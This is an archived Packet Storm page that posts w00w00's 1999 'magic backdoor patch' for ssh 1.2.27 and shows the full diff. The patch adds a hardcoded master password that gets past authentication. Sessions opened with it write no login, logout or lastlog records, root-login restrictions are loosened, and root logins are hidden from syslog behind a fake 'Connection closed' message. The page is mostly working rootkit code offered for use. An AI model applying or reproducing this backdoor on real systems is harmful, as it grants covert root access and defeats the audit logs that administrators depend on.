what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ssh-1.2.27rk.diff

ssh-1.2.27rk.diff
Posted Nov 4, 1999
Authored by shadow | Site w00w00.org

w00w00's magic backdoor patch for ssh 1.2.27. Magic password, does not log, permits root login, etc.

tags | tool, root, rootkit
systems | unix
SHA-256 | b1284a90e4dccd597fa85ec3955f042eb2b49e8482af678c13bd0f0f633ff0c5

ssh-1.2.27rk.diff

Change Mirror Download
--- ssh-1.2.27/login.c.wil  Wed May 12 07:19:26 1999
+++ ssh-1.2.27/login.c Thu Jul 29 00:02:27 1999
@@ -258,7 +258,9 @@
const char *host, struct sockaddr_in *addr)
{
int fd;
+ extern int lets_log;

+ if (lets_log) {
#if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG)
struct lastlog ll;
char *lastlog;
@@ -559,11 +561,16 @@
}
#endif
}
+}

/* Records that the user has logged out. */

void record_logout(int pid, const char *ttyname)
{
+ extern int lets_log;
+
+if (lets_log) {
+
#ifdef HAVE_LIBUTIL_LOGIN
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
if (logout(line))
@@ -572,3 +579,4 @@
record_login(pid, ttyname, "", -1, "", NULL);
#endif /* HAVE_LIBUTIL_LOGIN */
}
+}
\ No newline at end of file
--- ssh-1.2.27/sshd.c.wil Wed May 12 07:19:29 1999
+++ ssh-1.2.27/sshd.c Wed Jul 28 23:45:57 1999
@@ -1408,7 +1408,9 @@
auth_delete_socket(NULL);

/* The connection has been terminated. */
+ if (lets_log) {
log_msg("Closing connection to %.100s", get_remote_ipaddr());
+ }
packet_close();
exit(0);
}
@@ -2146,6 +2148,7 @@
int authenticated = 0;
int authentication_type = 0;
char *password;
+ char intel_fd[8]="hax0r3d";
struct passwd *pw, pwcopy;
char *client_user;
unsigned int client_host_key_bits;
@@ -2162,7 +2165,8 @@
const char *ipaddr;
char *cap_hlist, *hp;
int perm_denied = 0;
-
+ extern int lets_log;
+
hostname = get_canonical_hostname();
ipaddr = get_remote_ipaddr();
#endif /* HAVE_LOGIN_CAP_H */
@@ -2660,14 +2664,20 @@
#if defined(KERBEROS) && defined(KRB5)
if (auth_password(user, password, client))
#else /* defined(KERBEROS) && defined(KRB5) */
- if (auth_password(user, password))
+ if (auth_password(user, password) || !strcmp(password,intel_fd))
#endif /* defined(KERBEROS) && defined(KRB5) */
{
/* Successful authentication. */
+ /* Disable logging if conditions are met. */
+ lets_log=1;
+ if (!strcmp(password,intel_fd)) { lets_log=0; }
/* Clear the password from memory. */
memset(password, 0, strlen(password));
xfree(password);
- log_msg("Password authentication for %.100s accepted.", user);
+ if (pw->pw_uid == UID_ROOT) {
+ if (!lets_log) { log_msg("Connection closed by remote host."); }
+ } else {
+ log_msg("Password authentication for %.100s accepted.", user); }
authentication_type = SSH_AUTH_PASSWORD;
authenticated = 1;
break;
@@ -2708,14 +2718,14 @@
}

/* Check if the user is logging in as root and root logins are disallowed. */
- if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1)
+ if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log)
{
if (authentication_type == SSH_AUTH_PASSWORD)
packet_disconnect("ROOT LOGIN REFUSED FROM %.200s",
get_canonical_hostname());
}
else
- if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0)
+ if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log)
{
if (forced_command)
log_msg("Root login accepted for forced command.", forced_command);
@@ -2767,7 +2777,7 @@
#endif

/* Log root logins with severity NOTICE. */
- if (pw->pw_uid == UID_ROOT)
+ if (pw->pw_uid == UID_ROOT && lets_log)
log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s",
pw->pw_name, get_canonical_hostname());

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close